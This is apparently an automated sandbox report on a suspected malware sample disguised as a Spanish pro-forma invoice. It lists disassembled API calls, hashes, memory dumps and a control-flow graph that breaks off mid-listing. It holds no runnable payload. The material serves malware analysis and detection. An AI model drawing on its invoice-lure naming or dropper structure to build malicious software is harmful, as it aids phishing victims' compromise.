                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3355392842
                                                  • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
                                                  • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
                                                  Function 707E10E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 707E1171
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 707E11E3
                                                  • GlobalFree.KERNEL32 ref: 707E124A
                                                  • GlobalFree.KERNEL32(?), ref: 707E129B
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E12B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  • Associated: 00000000.00000002.84226292605.00000000707E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226422708.00000000707E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226496862.00000000707E6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 2ca2ee5751d2231c66c52cf6aee1c1dbc79bf5245e7db97294e4f9a66282cbd9
                                                  • Instruction ID: 304e389d326d32283102db16ef18834793e94003457e41f887778290bea29125
                                                  • Opcode Fuzzy Hash: 2ca2ee5751d2231c66c52cf6aee1c1dbc79bf5245e7db97294e4f9a66282cbd9
                                                  • Instruction Fuzzy Hash: 1A516E7660220ADFD701DF7ACD8AA2977B8FB04315B6045A9FA46DB320E774ED00CB54
                                                  Function 00402663 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll), ref: 004026BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp$C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll
                                                  • API String ID: 1659193697-1861086917
                                                  • Opcode ID: 581e924386a125687160958282dd6cfcb583c7f50f83c58c9207917b094514fd
                                                  • Instruction ID: a3276bd60f4d5d6bb2aa79b2f1cf5674750ecc9aad51c5d7eefbc562b3e224a1
                                                  • Opcode Fuzzy Hash: 581e924386a125687160958282dd6cfcb583c7f50f83c58c9207917b094514fd
                                                  • Instruction Fuzzy Hash: 7B112B71A10211BBCB00BBB19E469AE3B61AF50348F20443FF402B61C1DAFD8851631E
                                                  Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,0040321C,?), ref: 00403051
                                                  • GetTickCount.KERNEL32 ref: 0040306F
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                  • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                  • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                                  • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                  • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                                  Function 0040553A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405569
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                                    • Part of subcall function 0040450C: SendMessageW.USER32(00010430,00000000,00000000,00000000), ref: 0040451E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                  • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                                  • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                  • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                                  Function 00405E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 00405E62
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 00405E72
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3370423016
                                                  • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
                                                  • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC
                                                  Function 00405F96 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                                  • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                  • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                                  • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                  • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69

                                                  Execution Graph

                                                  Execution Coverage:0%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:100%
                                                  Total number of Nodes:1
                                                  Total number of Limit Nodes:0
                                                  execution_graph 70948 36772a80 LdrInitializeThunk

                                                  Executed Functions

                                                  Function 367734E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 367734e0-367734ec LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 61990b1e7f2d324cba8fc18a684e142c0ca24dbbadf34f784ce7af880f6c4918
                                                  • Instruction ID: 8fae334297558b894a13566fbe97d9cfccfc16b2e82420e65b52288fb08df7f8
                                                  • Opcode Fuzzy Hash: 61990b1e7f2d324cba8fc18a684e142c0ca24dbbadf34f784ce7af880f6c4918
                                                  • Instruction Fuzzy Hash: 9490023161510442D50062594615706100547D0201FA1C916A1418928DC7A58D55B5A3
                                                  Function 36772EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4 36772eb0-36772ebc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a24d7f51c236e1546005d664238948e8aa65f7a1d9e896224f0db896ec628495
                                                  • Instruction ID: 2fedd02e1e4ae4b0a9416b14a4138d28b3046d8eaf23c97c8db8b87b1c1bbfdf
                                                  • Opcode Fuzzy Hash: a24d7f51c236e1546005d664238948e8aa65f7a1d9e896224f0db896ec628495
                                                  • Instruction Fuzzy Hash: D390023121140442D5006259491570B000547D0302F91C516A2158915DC6358C55B572
                                                  Function 36772D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3 36772d10-36772d1c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 70faf632732ae26bcd0aa52a1c1672aedd8c797cd5a716103dbe8cae6b40ea6e
                                                  • Instruction ID: f0e0c9cc5c69cb8a0e9d2cef0618824ab443e30cfcf81789498273c285554d74
                                                  • Opcode Fuzzy Hash: 70faf632732ae26bcd0aa52a1c1672aedd8c797cd5a716103dbe8cae6b40ea6e
                                                  • Instruction Fuzzy Hash: 8590023121100453D51162594605707000947D0241FD1C917A1418918DD6668D56F122
                                                  Function 36772A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 36772a80-36772a8c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 51a725313ffc307ffedf0924e726350309383faa150522c690f8465044f0d730
                                                  • Instruction ID: 975658ffab539483c9003e62558f3a010998080e2ade6f596ce801a3f0b0b75e
                                                  • Opcode Fuzzy Hash: 51a725313ffc307ffedf0924e726350309383faa150522c690f8465044f0d730
                                                  • Instruction Fuzzy Hash: FB90026121200043450572594515616400A47E0201B91C526E2008950DC5358C95B126
                                                  Function 36772BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2 36772bc0-36772bcc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 84332e8e1ef124de4907b0f12ca3ef309e5ebc0d58ccf69b5bdc4c8b8880b92d
                                                  • Instruction ID: 3578ce74d755f48ae0f1b3a0259a4afb43324cf02019cee3f0509c25c880f83e
                                                  • Opcode Fuzzy Hash: 84332e8e1ef124de4907b0f12ca3ef309e5ebc0d58ccf69b5bdc4c8b8880b92d
                                                  • Instruction Fuzzy Hash: F790023121100442D50066995509646000547E0301F91D516A6018915EC6758C95B132
                                                  Function 36772B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1 36772b90-36772b9c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5a603fcc1b0f47600289c255d1055fd933ea34b1d4f7d96e1ca2de3d9982236a
                                                  • Instruction ID: 408ba9d234a1d6c03fec6c098ba136baf85af223bf83007b19575f95eb6b86b4
                                                  • Opcode Fuzzy Hash: 5a603fcc1b0f47600289c255d1055fd933ea34b1d4f7d96e1ca2de3d9982236a
                                                  • Instruction Fuzzy Hash: F890023121108842D5106259850574A000547D0301F95C916A5418A18DC6A58C95B122

                                                  Non-executed Functions

                                                  Function 367D9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 588 367d9060-367d90a9 589 367d90f8-367d9107 588->589 590 367d90ab-367d90b0 588->590 591 367d9109-367d910e 589->591 592 367d90b4-367d90ba 589->592 590->592 593 367d9893-367d98a7 call 36774b50 591->593 594 367d9215-367d923d call 36778f40 592->594 595 367d90c0-367d90e4 call 36778f40 592->595 602 367d925c-367d9292 594->602 603 367d923f-367d925a call 367d98aa 594->603 604 367d90e6-367d90f3 call 367f92ab 595->604 605 367d9113-367d91b4 GetPEB call 367dd7e5 595->605 608 367d9294-367d9296 602->608 603->608 614 367d91fd-367d9210 RtlDebugPrintTimes 604->614 615 367d91b6-367d91c4 605->615 616 367d91d2-367d91e7 605->616 608->593 612 367d929c-367d92b1 RtlDebugPrintTimes 608->612 612->593 622 367d92b7-367d92be 612->622 614->593 615->616 617 367d91c6-367d91cb 615->617 616->614 618 367d91e9-367d91ee 616->618 617->616 620 367d91f0 618->620 621 367d91f3-367d91f6 618->621 620->621 621->614 622->593 624 367d92c4-367d92df 622->624 625 367d92e3-367d92f4 call 367da388 624->625 628 367d92fa-367d92fc 625->628 629 367d9891 625->629 628->593 630 367d9302-367d9309 628->630 629->593 631 367d947c-367d9482 630->631 632 367d930f-367d9314 630->632 635 367d961c-367d9622 631->635 636 367d9488-367d94b7 call 36778f40 631->636 633 367d933c 632->633 634 367d9316-367d931c 632->634 638 367d9340-367d9391 call 36778f40 RtlDebugPrintTimes 633->638 634->633 637 367d931e-367d9332 634->637 640 367d9674-367d9679 635->640 641 367d9624-367d962d 635->641 653 367d94b9-367d94c4 636->653 654 367d94f0-367d9505 636->654 644 367d9338-367d933a 637->644 645 367d9334-367d9336 637->645 638->593 680 367d9397-367d939b 638->680 642 367d967f-367d9687 640->642 643 367d9728-367d9731 640->643 641->625 648 367d9633-367d966f call 36778f40 641->648 649 367d9689-367d968d 642->649 650 367d9693-367d96bd call 367d8093 642->650 643->625 652 367d9737-367d973a 643->652 644->638 645->638 665 367d9869 648->665 649->643 649->650 677 367d9888-367d988c 650->677 678 367d96c3-367d971e call 36778f40 RtlDebugPrintTimes 650->678 659 367d97fd-367d9834 call 36778f40 652->659 660 367d9740-367d978a 652->660 661 367d94cf-367d94ee 653->661 662 367d94c6-367d94cd 653->662 656 367d9507-367d9509 654->656 657 367d9511-367d9518 654->657 666 367d950f 656->666 667 367d950b-367d950d 656->667 668 367d953d-367d953f 657->668 690 367d983b-367d9842 659->690 691 367d9836 659->691 672 367d978c 660->672 673 367d9791-367d979e 660->673 664 367d9559-367d9576 RtlDebugPrintTimes 661->664 662->661 664->593 694 367d957c-367d959f call 36778f40 664->694 674 367d986d 665->674 666->657 667->657 681 367d951a-367d9524 668->681 682 367d9541-367d9557 668->682 672->673 675 367d97aa-367d97ad 673->675 676 367d97a0-367d97a3 673->676 684 367d9871-367d9886 RtlDebugPrintTimes 674->684 685 367d97af-367d97b2 675->685 686 367d97b9-367d97fb 675->686 676->675 677->625 678->593 720 367d9724 678->720 692 367d939d-367d93a5 680->692 693 367d93eb-367d9400 680->693 687 367d952d 681->687 688 367d9526 681->688 682->664 684->593 684->677 685->686 686->684 698 367d952f-367d9531 687->698 688->682 696 367d9528-367d952b 688->696 699 367d984d 690->699 700 367d9844-367d984b 690->700 691->690 701 367d93a7-367d93d0 call 367d8093 692->701 702 367d93d2-367d93e9 692->702 695 367d9406-367d9414 693->695 717 367d95bd-367d95d8 694->717 718 367d95a1-367d95bb 694->718 704 367d9418-367d946f call 36778f40 RtlDebugPrintTimes 695->704 696->698 706 367d953b 698->706 707 367d9533-367d9535 698->707 708 367d9851-367d9857 699->708 700->708 701->704 702->695 704->593 724 367d9475-367d9477 704->724 706->668 707->706 713 367d9537-367d9539 707->713 714 